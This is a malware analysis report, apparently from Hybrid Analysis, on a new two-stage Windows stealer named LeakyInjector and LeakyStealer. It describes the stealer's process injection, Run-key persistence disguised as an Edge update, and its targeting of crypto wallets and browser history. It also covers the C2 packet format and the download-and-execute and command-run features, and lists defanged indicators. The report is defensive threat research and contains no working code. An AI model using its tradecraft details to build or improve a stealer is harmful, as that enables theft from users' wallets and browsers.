Author(s): Vlad Pasca, Radu-Emanuel Chiscariu
- New two-stage malware targets cryptocurrency wallets and browser history
- LeakyInjector uses low-level APIs for injection to avoid detection and injects LeakyStealer in explorer.exe
- LeakyStealer implements a “polymorphic engine” that is able to modify its memory area with hard-coded bytes at runtime
- Both were signed with valid Extended Validation certificate
- LeakyStealer beacons to the C2 server at regular intervals
- Multiple related samples use the same certificate infrastructure
Hybrid Analysis has analyzed a new two-stage malware that we’re naming LeakyInjector and LeakyStealer. The duo performs reconnaissance on an infected machine and targets multiple crypto wallets, including browser extensions corresponding to crypto wallets. The malware also looks for browser history files from Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi.
The first stage (LeakyInjector) decrypts the ChaCha20-encrypted second stage (LeakyStealer) and injects the payload into the explorer.exe process. The stealer computes the Bot ID corresponding to the infected machine and establishes persistence using an entry under the Run registry key. The malware implements a polymorphic engine that modifies memory bytes using specific hard-coded values. LeakyStealer searches for crypto wallets such as Electrum, Exodus, Atomic, Sparrow, Ledger Live, Guarda, and BitPay in addition to browser extensions like MetaMask, Phantom, Coinbase, and Trust Wallet. Two backdoor commands are implemented: downloading and executing a file, and executing Windows commands.
A Hybrid Analysis Perspective
The sample is a 64-bit Windows executable (approximately 30 MB, padded with null bytes) and is signed with a valid digital certificate. The malware contains numerous debug strings and artifacts, indicating minimal obfuscation.
Figure 1 - File Summary
The malware establishes persistence by creating an entry under the Run registry key:
Figure 2 - Persistence through registry manipulation
Looking at the “HTTP Traffic” in the Hybrid Analysis report, we can identify HTTP POST requests used for C2 communications. The domain was recently registered. The process connects to 45[.]151[.]62[.]120 on port 443 (TCP), using a browser-related user agent.
Figure 3 - HTTP POST requests to the C2 server
The stealer is looking for different browser extensions corresponding to crypto wallets:
Figure 4 - Crypto wallets are targeted
The malware reads browser-related files to retrieve the browser history, as highlighted in the figure below.
Figure 5 - Accessing browser-related data
A Deeper Dive
LeakyInjector analysis
The first stage - which we named LeakyInjector - is looking for the “explorer.exe” process on the host:
Figure 6 - The injector searches for the explorer.exe process
The malware injects the next stage into the explorer process using the low level APIs displayed below.
Figure 7 - Perform process injection using low level APIs
The stealer that we called LeakyStealer is stored in an encrypted form in the injector and is decrypted using the ChaCha20 algorithm, with the key and nonce being hard-coded.
Figure 8 - ChaCha20 algorithm is used to decrypt the stealer before it’s being injected
LeakyStealer analysis
The malware computes the Bot ID of the infected host by XOR-ing the “C:\” volume serial number with the 0xDEADBEEF constant. If not available, the Bot ID is initialized using the GetTickCount function.
Figure 9 - Bot ID value is computed
It retrieves the hostname, the username, and the domain assigned to the local machine (see Figure 10).
Figure 10 - Extract information that will be exfiltrated
The malicious process determines whether it’s running with admin privileges using the GetTokenInformation API (0x14 = TokenElevation):
Figure 11 - Determine if the malware is running with admin privileges
The binary connects to the everstead[.]group C2 server using a hard-coded user agent, as highlighted below.
Figure 12 - First connection to the C2 server
A field called “Traffic Tag” is initialized with the “convert” value. Figure 13 reveals the verbose output containing information extracted in previous steps.
Figure 13 - Multiple debugging strings shown
Persistence
The stealer copies itself as “MicrosoftEdgeUpdateCore.exe” in the “%AppData%” directory. It establishes persistence by creating an entry called “EdgeUpdateCore” under the Run registry key:
Figure 14 - Self-copy and persistence
LeakyStealer implements a “polymorphic engine” that is able to modify its memory area with hard-coded bytes at runtime:
Figure 15 - Modify bytes using a routine called polymorphic engine at runtime
The search is performed for the 8-byte marker “DE AD BE EF CA FE BA BE”. The process changes the memory protection of the first 16 bytes (including the marker) using VirtualProtect (0x40 = PAGE_EXECUTE_READWRITE). These 16 bytes are modified to a randomized sequence of “no-operation” assembly instructions, such as 0x90 for NOP, “EB 00” for JMP 0x2, or “66 90” for “XCHG AX, AX”. The code that performs the patching is fairly common and frequently found in video game cheat engines. Its purpose in this sample remains unclear as it does not change any actual code and limits the patching to the marker bytes.
Figure 16 - Replace the 16 bytes containing the hard-coded marker using different bytes
The binary enters a loop that builds a registration packet that will be sent to the C2 server (Figure 17).
Figure 17 - LeakyStealer is beaconing to the C2 server at regular intervals
The RtlGetVersion and GetVersionExA methods are utilized to obtain the Windows version:
Figure 18 - Retrieve the Windows OS version
Data exfiltration
The registration packet contains the “LOAD” magic string, the Bot ID, 0x01 (value corresponding to a Registration packet), the admin flag, the traffic tag, the hostname, the username, the Windows domain, and the OS version:
Figure 19 - Registration packet is constructed
Figure 20 - Example of a registration packet
LeakyStealer is looking for cryptocurrency wallets such as Electrum, Exodus, Atomic, Sparrow, Ledger Live, Guarda, and BitPay:
Figure 21 - Multiple crypto wallets are targeted
Cryptocurrency browser extensions such as MetaMask, Phantom Wallet, Coinbase Wallet, and Trust Wallet are also targeted:
Figure 22 - Crypto browser extensions
The malware exfiltrates the registration packet to the “/api/beacon” URI. The server’s response is received and read using the WinHttpReceiveResponse and WinHttpReadData functions (Figure 23).
Figure 23 - Server’s response is received and parsed
The binary extracts the history file from the following browsers: Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi.
Figure 24 - Obtain the history file from multiple browsers
Every history file found is copied to the temporary folder as “history_%d.db”, where “%d” is generated via a function call to GetTickCount. The malware reads these files in memory and deletes them afterward using the DeleteFileA API, as highlighted below.
Figure 25 - Create copies of history files, read them, and then delete them afterwards
The browser history is exfiltrated to the C2 server using the “/api/beacon/history” URI. We observe that the stealer adds the “X-Bot-Id” header in the request:
Figure 26 - Browser history files are sent to the C2 server
Figure 27 - Example of exfiltrating the browsing history files
The server’s response has the following structure: “LOAD<1-byte Command type><4-byte Command length><Command>”. The command type can be 0 (No command from the server), 1 (two commands implemented by the stealer), and >=2 (Unknown command type).
Figure 28 - Specific packet structure is expected from the C2 server
Stealer Commands
The first command is used to download and execute a file from the C2 server. It has the “download URL Localfile” structure.
Figure 29 - Download command implemented by LeakyStealer
As we can see below, the process downloads the file from the C2 server, creates and populates the newly created file, and finally executes it using the CreateProcessA method.
Figure 30 - Create new file mentioned in the command
Figure 31 - CreateProcessA API call
The second command can be used to run Windows commands on the infected machine and sends the output to the C2 server. The output is read using an anonymous pipe:
Figure 32 - Execute Windows command on the infected host
Mapping the infrastructure
The certificate’s issuer details point to a Hong Kong registrant. Similar versions of the stealer were signed with the same certificate. At the time of the analysis, the certificate was still valid, but at the time of publishing this report it has been revoked by its issuer.
Figure 33 - Signed Certificate information
The certificate thumbprint A8BF7554363D27DEB374C4E2658AC05C60E3BAA7 revealed seven related samples, demonstrating that the threat actor reuses signing infrastructure across multiple payloads.
Signer: Hefei Nudan Jukuang Network Technology Co., Ltd.
Valid Period: September 9, 2025 - September 9, 2026
Issuer: Sectigo Public Code Signing CA EV R36
This legitimate Extended Validation (EV) certificate may have been potentially obtained through fraudulent means or a compromised business entity may have potentially been abused for malware signing. The seven samples share consistent operational patterns:
- Persistence mechanisms across all variants
- Masquerading as legitimate Microsoft Edge update components
- Recent activity with samples spanning October 1-9, 2025
A Shodan search for the IP address returns open ports 22, 80 and 443.
Figure 34 - Shodan search
There are two domains associated with the IP address, namely “everstead[.]group” and “ip-ptr[.]tech”.
Figure 35 - Shodan result for the IP address
The MSI file called “dynatrc.php” drops LeakyStealer with SHA256 dea8653698cea84e063165524c3e8c8141de246a29b9b8de40be3943fd1c6f14 that communicates with the same C2 server. The installer could be downloaded from the paycnex[.]com domain, as highlighted below:
Figure 36 - VirusTotal result shows the distribution site of the installer
We’ve identified a PowerShell script that is related to NetSupportRAT on the same domain:
Figure 37 - PowerShell script related to NetSupportRAT was stored on the distribution domain
LeakyStealer Through the Eyes of Hybrid Analysis
The Hybrid Analysis report identifies multiple behavioral patterns and indicators that classify LeakyStealer as a new, information-stealing malware. For example, it highlights that the process targets crypto browser extensions and the history files across multiple browsers. Through in-depth technical analysis of LeakyStealer’s core functionality, we’re potentially offering insights enabling more effective detection and defense strategies.
Hybrid Analysis is a powerful platform for identifying and analyzing malware, whether mundane or highly sophisticated. It provides detailed context and information that can be investigated further during the dynamic analysis of the malware. For performing a more in-depth analysis of malware samples, you can download them by registering with a Hybrid Analysis account and becoming a vetted user.
Indicators of Compromise
SHA256
Files created
%AppData%\MicrosoftEdgeUpdateCore.exe
C:\Users\<User>\AppData\Local\Temp\history_%d.db
Registry value
EdgeUpdateCore
C2 server
everstead[.]group
